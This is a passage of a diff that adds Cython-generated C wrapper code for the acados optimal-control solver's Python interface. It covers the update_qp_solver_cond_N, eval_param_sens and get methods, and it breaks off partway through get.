Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("update_qp_solver_cond_N (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_qp_solver_cond_N,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_qp_solver_cond_N)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 173, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "update_qp_solver_cond_N") < 0)) __PYX_ERR(0, 173, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_qp_solver_cond_N = ((PyObject*)values[0]); + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("update_qp_solver_cond_N", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 173, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.update_qp_solver_cond_N", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_qp_solver_cond_N), (&PyInt_Type), 0, "qp_solver_cond_N", 1))) __PYX_ERR(0, 173, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_10update_qp_solver_cond_N(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_qp_solver_cond_N); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_10update_qp_solver_cond_N(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_qp_solver_cond_N) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("update_qp_solver_cond_N", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":186 + * `qp_solver_cond_N < N`. + * """ + * raise NotImplementedError("AcadosOcpSolverCython: does not support update_qp_solver_cond_N() since it is only a prototyping feature") # <<<<<<<<<<<<<< + * + * # # unlikely but still possible + */ + __pyx_t_1 = __Pyx_PyObject_Call(__pyx_builtin_NotImplementedError, __pyx_tuple__12, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 186, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":173 + * + * + * def update_qp_solver_cond_N(self, qp_solver_cond_N: int): # <<<<<<<<<<<<<< + * """ + * Recreate solver with new value `qp_solver_cond_N` with a partial condensing QP solver. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.update_qp_solver_cond_N", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":207 + * + * + * def eval_param_sens(self, index, stage=0, field="ex"): # <<<<<<<<<<<<<< + * """ + * Calculate the sensitivity of the curent solution with respect to the initial state component of index + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13eval_param_sens(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_12eval_param_sens, "\n Calculate the sensitivity of the curent solution with respect to the initial state component of index\n\n :param index: integer corresponding to initial state index in range(nx)\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13eval_param_sens = {"eval_param_sens", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13eval_param_sens, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_12eval_param_sens}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13eval_param_sens(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_index = 0; + PyObject *__pyx_v_stage = 0; + PyObject *__pyx_v_field = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("eval_param_sens (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_index,&__pyx_n_s_stage,&__pyx_n_s_field,0}; + PyObject* values[3] = {0,0,0}; + values[1] = ((PyObject *)__pyx_int_0); + values[2] = ((PyObject *)__pyx_n_u_ex); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_index)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 207, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stage); + if (value) { values[1] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 207, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 207, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "eval_param_sens") < 0)) __PYX_ERR(0, 207, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_index = values[0]; + __pyx_v_stage = values[1]; + __pyx_v_field = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("eval_param_sens", 0, 1, 3, __pyx_nargs); __PYX_ERR(0, 207, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.eval_param_sens", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_12eval_param_sens(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_index, __pyx_v_stage, __pyx_v_field); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_12eval_param_sens(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_stage, PyObject *__pyx_v_field) { + PyObject *__pyx_v_field_ = NULL; + int __pyx_v_nx; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + char const *__pyx_t_7; + Py_ssize_t __pyx_t_8; + Py_UCS4 __pyx_t_9; + char *__pyx_t_10; + int __pyx_t_11; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("eval_param_sens", 0); + __Pyx_INCREF(__pyx_v_field); + + /* "acados_template/acados_ocp_solver_pyx.pyx":214 + * """ + * + * field_ = field # <<<<<<<<<<<<<< + * field = field_.encode('utf-8') + * + */ + __Pyx_INCREF(__pyx_v_field); + __pyx_v_field_ = __pyx_v_field; + + /* "acados_template/acados_ocp_solver_pyx.pyx":215 + * + * field_ = field + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * # checks + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_field_, __pyx_n_s_encode); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 215, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_kp_u_utf_8}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 215, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __Pyx_DECREF_SET(__pyx_v_field, __pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":218 + * + * # checks + * if not isinstance(index, int): # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.eval_param_sens(): index must be Integer.') + * + */ + __pyx_t_5 = PyInt_Check(__pyx_v_index); + __pyx_t_6 = (!__pyx_t_5); + if (unlikely(__pyx_t_6)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":219 + * # checks + * if not isinstance(index, int): + * raise Exception('AcadosOcpSolverCython.eval_param_sens(): index must be Integer.') # <<<<<<<<<<<<<< + * + * cdef int nx = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, self.nlp_dims, self.nlp_out, 0, "x".encode('utf-8')) + */ + __pyx_t_1 = __Pyx_PyObject_Call(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_tuple__13, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 219, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 219, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":218 + * + * # checks + * if not isinstance(index, int): # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.eval_param_sens(): index must be Integer.') + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":221 + * raise Exception('AcadosOcpSolverCython.eval_param_sens(): index must be Integer.') + * + * cdef int nx = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, self.nlp_dims, self.nlp_out, 0, "x".encode('utf-8')) # <<<<<<<<<<<<<< + * + * if index < 0 or index > nx: + */ + __pyx_t_7 = __Pyx_PyBytes_AsString(__pyx_n_b_x); if (unlikely((!__pyx_t_7) && PyErr_Occurred())) __PYX_ERR(0, 221, __pyx_L1_error) + __pyx_v_nx = ocp_nlp_dims_get_from_attr(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, 0, __pyx_t_7); + + /* "acados_template/acados_ocp_solver_pyx.pyx":223 + * cdef int nx = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, self.nlp_dims, self.nlp_out, 0, "x".encode('utf-8')) + * + * if index < 0 or index > nx: # <<<<<<<<<<<<<< + * raise Exception(f'AcadosOcpSolverCython.eval_param_sens(): index must be in [0, nx-1], got: {index}.') + * + */ + __pyx_t_1 = PyObject_RichCompare(__pyx_v_index, __pyx_int_0, Py_LT); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 223, __pyx_L1_error) + __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 223, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (!__pyx_t_5) { + } else { + __pyx_t_6 = __pyx_t_5; + goto __pyx_L5_bool_binop_done; + } + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_nx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 223, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyObject_RichCompare(__pyx_v_index, __pyx_t_1, Py_GT); __Pyx_XGOTREF(__pyx_t_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 223, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_2); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 223, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_6 = __pyx_t_5; + __pyx_L5_bool_binop_done:; + if (unlikely(__pyx_t_6)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":224 + * + * if index < 0 or index > nx: + * raise Exception(f'AcadosOcpSolverCython.eval_param_sens(): index must be in [0, nx-1], got: {index}.') # <<<<<<<<<<<<<< + * + * # actual eval_param + */ + __pyx_t_2 = PyTuple_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 224, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_8 = 0; + __pyx_t_9 = 127; + __Pyx_INCREF(__pyx_kp_u_AcadosOcpSolverCython_eval_param_2); + __pyx_t_8 += 74; + __Pyx_GIVEREF(__pyx_kp_u_AcadosOcpSolverCython_eval_param_2); + PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_kp_u_AcadosOcpSolverCython_eval_param_2); + __pyx_t_1 = __Pyx_PyObject_FormatSimple(__pyx_v_index, __pyx_empty_unicode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 224, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_9 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_9) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_9; + __pyx_t_8 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u__2); + __pyx_t_8 += 1; + __Pyx_GIVEREF(__pyx_kp_u__2); + PyTuple_SET_ITEM(__pyx_t_2, 2, __pyx_kp_u__2); + __pyx_t_1 = __Pyx_PyUnicode_Join(__pyx_t_2, 3, __pyx_t_8, __pyx_t_9); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 224, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 224, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 224, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":223 + * cdef int nx = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, self.nlp_dims, self.nlp_out, 0, "x".encode('utf-8')) + * + * if index < 0 or index > nx: # <<<<<<<<<<<<<< + * raise Exception(f'AcadosOcpSolverCython.eval_param_sens(): index must be in [0, nx-1], got: {index}.') + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":227 + * + * # actual eval_param + * acados_solver_common.ocp_nlp_eval_param_sens(self.nlp_solver, field, stage, index, self.sens_out) # <<<<<<<<<<<<<< + * + * return + */ + __pyx_t_10 = __Pyx_PyObject_AsWritableString(__pyx_v_field); if (unlikely((!__pyx_t_10) && PyErr_Occurred())) __PYX_ERR(0, 227, __pyx_L1_error) + __pyx_t_4 = __Pyx_PyInt_As_int(__pyx_v_stage); if (unlikely((__pyx_t_4 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 227, __pyx_L1_error) + __pyx_t_11 = __Pyx_PyInt_As_int(__pyx_v_index); if (unlikely((__pyx_t_11 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 227, __pyx_L1_error) + ocp_nlp_eval_param_sens(__pyx_v_self->nlp_solver, __pyx_t_10, __pyx_t_4, __pyx_t_11, __pyx_v_self->sens_out); + + /* "acados_template/acados_ocp_solver_pyx.pyx":229 + * acados_solver_common.ocp_nlp_eval_param_sens(self.nlp_solver, field, stage, index, self.sens_out) + * + * return # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":207 + * + * + * def eval_param_sens(self, index, stage=0, field="ex"): # <<<<<<<<<<<<<< + * """ + * Calculate the sensitivity of the curent solution with respect to the initial state component of index + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.eval_param_sens", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_field_); + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":232 + * + * + * def get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get the last solution of the solver: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_15get(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_14get, "\n Get the last solution of the solver:\n\n :param stage: integer corresponding to shooting node\n :param field: string in ['x', 'u', 'z', 'pi', 'lam', 't', 'sl', 'su',]\n\n .. note:: regarding lam, t: \n\n the inequalities are internally organized in the following order: \n\n [ lbu lbx lg lh lphi ubu ubx ug uh uphi; \n\n lsbu lsbx lsg lsh lsphi usbu usbx usg ush usphi]\n\n .. note:: pi: multipliers for dynamics equality constraints \n\n lam: multipliers for inequalities \n\n t: slack variables corresponding to evaluation of all inequalities (at the solution) \n\n sl: slack variables of soft lower inequality constraints \n\n su: slack variables of soft upper inequality constraints \n\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_15get = {"get", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_15get, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_14get}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_15get(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_stage; + PyObject *__pyx_v_field_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_stage,&__pyx_n_s_field_2,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stage)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 232, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 232, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("get", 1, 2, 2, 1); __PYX_ERR(0, 232, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "get") < 0)) __PYX_ERR(0, 232, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_stage = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_stage == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 232, __pyx_L3_error) + __pyx_v_field_ = ((PyObject*)values[1]); + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("get", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 232, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_field_), (&PyUnicode_Type), 1, "field_", 1))) __PYX_ERR(0, 232, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_14get(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_stage, __pyx_v_field_); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_14get(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_) { + PyObject *__pyx_v_out_fields = NULL; + PyObject *__pyx_v_field = NULL; + int __pyx_v_dims; + PyArrayObject *__pyx_v_out = 0; + __Pyx_LocalBuf_ND __pyx_pybuffernd_out; + __Pyx_Buffer __pyx_pybuffer_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + char const *__pyx_t_8; + PyArrayObject *__pyx_t_9 = NULL; + char const *__pyx_t_10; + char *__pyx_t_11; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get", 0); + __pyx_pybuffer_out.pybuffer.buf = NULL; + __pyx_pybuffer_out.refcount = 0; + __pyx_pybuffernd_out.data = NULL; + __pyx_pybuffernd_out.rcbuffer = &__pyx_pybuffer_out; + + /* "acados_template/acados_ocp_solver_pyx.pyx":251 + * """ + * + * out_fields = ['x', 'u', 'z', 'pi', 'lam', 't', 'sl', 'su'] # <<<<<<<<<<<<<< + * field = field_.encode('utf-8') + * + */ + __pyx_t_1 = PyList_New(8); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 251, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_x); + __Pyx_GIVEREF(__pyx_n_u_x); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_x); + __Pyx_INCREF(__pyx_n_u_u); + __Pyx_GIVEREF(__pyx_n_u_u); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_u); + __Pyx_INCREF(__pyx_n_u_z); + __Pyx_GIVEREF(__pyx_n_u_z); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_z); + __Pyx_INCREF(__pyx_n_u_pi); + 